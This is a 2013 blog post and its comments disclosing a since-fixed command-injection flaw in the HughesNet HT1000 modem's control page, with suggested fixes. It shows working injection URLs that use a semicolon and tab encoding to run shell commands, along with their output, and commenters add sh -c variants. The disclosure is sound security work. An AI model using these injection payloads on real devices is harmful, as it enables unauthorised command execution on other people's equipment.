HT1000 URL Parsing Vulnerability (now fixed!)

Published by on August 23, 2013 | 6 Responses

Disclaimer: This issue has recently (September-ish) been fixed by HughesNet (thank you!) in a firmware update to the HT1000 modem. I am reposting the old article for historical purposes.

The HT1000 modem has a configuration/status webpage called the “System Control Center” (SCC) at the IP address 192.168.0.1. Certain malformed URL within the SCC will cause an arbitrary command to be executed on the modem as an unprivileged user.

This security hole is related to the command to enable and disable Web Acceleration.

To disable WAC, the following URL is called:

http://192.168.0.1/cgi-bin/command.cgi?Command=314&disableWAC=on

To enable WAC, this URL is called:

http://192.168.0.1/cgi-bin/command.cgi?Command=314

However, it appears that arbitrary commands can be executed through this URL. Inserting a semicolon and then an arbitrary command results in that command being executed, with the output being piped back to the web browser. For example, visiting the following URL results in some unexpected output:

http://192.168.0.1/cgi-bin/command.cgi?Command=314&;ls
Command cannot be executed. URI: /wac_userdisable query: command.cgi
index.cgi
install.cgi
pktdump.cgi
reg.cgi
statscmd.cgi
testcmd.cgi
witcmd.cgi

This is the output of the Linux command ls. pktdump.cgi is of particular interest…

Although spaces are filtered out by the web server (throwing a 501 Not Implemented page), tabs are not. As such, longer commands can be crafted.

http://192.168.0.1/cgi-bin/command.cgi?Command=314&;ps%09-w
Command cannot be executed. URI: /wac_userdisable query:   PID USER       VSZ STAT COMMAND
    1 root      1812 S    init  
    2 root         0 SW<  [kthreadd]
    3 root         0 SW<  [ksoftirqd/0]
    4 root         0 SW<  [events/0]
    5 root         0 SW<  [khelper]
    6 root         0 SW<  [kblockd/0]
    7 root         0 SW<  [kseriod]
    8 root         0 SW   [pdflush]
    9 root         0 SW   [pdflush]
   10 root         0 SW<  [kswapd0]
   11 root         0 SW<  [aio/0]
   12 root         0 SW<  [nfsiod]
   21 root         0 SW<  [mtdblockd]
   22 root         0 SW<  [rpciod/0]
   29 root      2260 S    klogd -c 4 
   55 root      3016 S    /bin/sh /etc/restartMon.sh 
   68 root         0 SW<  [loop0]
   80 root         0 SWN  [jffs2_gcd_mtd4]
  148 root         0 SW   [dlpktproc_Data]
  149 root         0 SW   [dlpktproc_Monit]
  155 root         0 SW   [kpep]
  319 root     30728 S    /fl0/apps/logrt 
  321 root     11280 S    ./sysmon 
  324 root      3080 S    /sbin/getty console 
  325 root      1984 S    /sbin/syslogd 
  329 root     19392 S    cfm 0 
  331 root     11608 S    tfw 1 
  334 root     17136 S    cac 2 
  335 root     31856 S    amu 3 
  336 root     11436 S    ledif 4 
  337 root     29448 S    tmu 5 
  338 root     41128 S    downlink 6 
  343 root     49556 S    uplink 7 
  344 root     18684 S    sdlmgr 8 
  351 root     28396 S    assoc 9 
  364 root     63292 S    diagmgr 10 
  365 root     27100 S    sysinfo 11 
  367 root     28388 S    sbc 12 
  368 root     20008 S    evtmgr 13 
  370 root     17220 S    ddnsc 14 
  371 root     17276 S    vptMgr 15 
  373 root     11544 S    dnsWrapper 16 
  375 root     11148 S    odumonitor 18 
  441 daemon    5136 S    HttpServer -d -4 -c /etc/httpd.conf 
  448 root     36012 S    web15 
  453 root      3608 S    Ntpd -g -c /etc/ntp.conf -p /var/run/ntpd.pid 
  520 root      4692 S    /usr/sbin/sshd -h /fl0/ssh/ssh_host_key -h /fl0/ssh/ssh_host_rsa_key -h /fl0/ssh/ssh_host_dsa_key 
  537 root     10888 S    Dhcpv4Server -4 -cf /etc/dhcpd_v4.conf -lf /var/dhcp/dhcpd_v4.leases -pf /var/run/dhcpd_v4.pid eth0 
  539 root     33524 S    Dhcpv6Server -6 -cf /etc/dhcpd_v6.conf -lf /var/dhcp/dhcpd_v6.leases -pf /var/run/dhcpd_v6.pid eth0 
  541 root     21908 S    snmpd -f -p /var/run/snmpd.pid -c /etc/snmpd.conf 
  543 root      1960 S    radvd 
  546 nobody   12096 S    dnsmasq -x /var/run/dnsmasq.pid -q -Q 8054 -p 10054 
 4137 root      2884 S    sleep 5 
 4138 daemon    5272 S    HttpServer -d -4 -c /etc/httpd.conf 
 4139 root     30068 S    command.cgi 
 4140 daemon    3016 S    sh -c wget -O - -q http://localhost:8088/wac_userdisable?;ps -w 
 4143 daemon    3192 R    ps -w

The sh command line visible above suggests that at least a portion of the URL is being piped directly to sh!

Unfortunately, the filesystem permissions on the modem are not very robust. /etc/passwd is not protected at all and can be accessed in this same way. Furthermore, netcat is available on the modem, which makes it very trivial to set up an unprivileged shell, but that is far beyond the scope of this post.

I hope this is enough information for HughesNet to pinpoint the URL handling bug and squash it flat.

To HughesNet employees, here are my suggestions for fixing it:

I see two quick ‘n dirty options.

1) Mod the webserver (nhttpd?) to filter out tabs as well as spaces in URLs, and/or make it scream if it sees a semicolon or other special shell characters.

2) Mod the .cgi app that calls the little app hanging around at localhost:8088 to similarly scream at special bash characters like semicolons.

For best security, do both. If you do #2 but not #1, another engineer may write a similar piece of code and introduce a new vulnerability.

Note: Hughes Net pushed out software version 2.2.0.9, which closed this hole on the HT1000. The HT1100 modem, which sports a newer firmware reversion when shipped, never had this vulnerability. It appears the hole was closed by modifying the onboard webserver to prevent nasty input from even reaching the underlying bash script.

6 Responses

  1. Robert Bibey
    Robert Bibey August 31, 2013 at 6:16 pm |

    Wow – I can honestly say this caught me offguard – excellent find though – makes me wonder if there’s other security issues related with this terminal – I am able to duplicate your entries on my term btw :) THanks for this and I’ll make sure it gets to the right people :)

    Reply
    1. Cody Jackson
      Cody Jackson August 31, 2013 at 6:37 pm |

      Thanks! I hope it is resolved soon. Do you have an HT1100 or an HT1000?

      Reply
      1. C0RR0SIVE
        C0RR0SIVE September 1, 2013 at 3:57 am |

        Pretty sure he has a 1000.

        Reply
  2. James 1979
    James 1979 September 2, 2013 at 4:23 pm |

    I assume that you realize that sh can be invoked directly such as http://192.168.0.1/cgi-bin/command.cgi?Command=314&amp;;sh%09-c%09%27who;pwd;date%27 .The commands will be executed as the user daemon. Be sure to try out the “whoCares” command in /bin:

    http://192.168.0.1/cgi-bin/command.cgi?Command=314&amp;;sh%09-c%09%27whoCares%27

    Command cannot be executed. URI: /wac_userdisable query: Hi, Mom!

    Reply
  3. anon
    anon September 2, 2013 at 4:51 pm |

    the 1100 is simply a 1000 with an added usb port, no other differences.

    Reply
  4. James 1979
    James 1979 September 4, 2013 at 12:57 pm |

    Cody, on the HughesNet community, I just suggested that you might consider contacting CERT at http://www.cert.org/contact_cert/ I can contact them too if you’d like since I know what commands will disable the modem. I imagine that HughesNet is already working on a fix, but I think that all browsers should give a warning if the browser encounters an address reserved for LANs. Even if HughesNet fixes the “extra commands to the shell” bug, someone could still execute arbitrary commands on the SCC (disable Web acceleration, etc.) and cause trouble for HughesNet and their customers.

    Reply

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.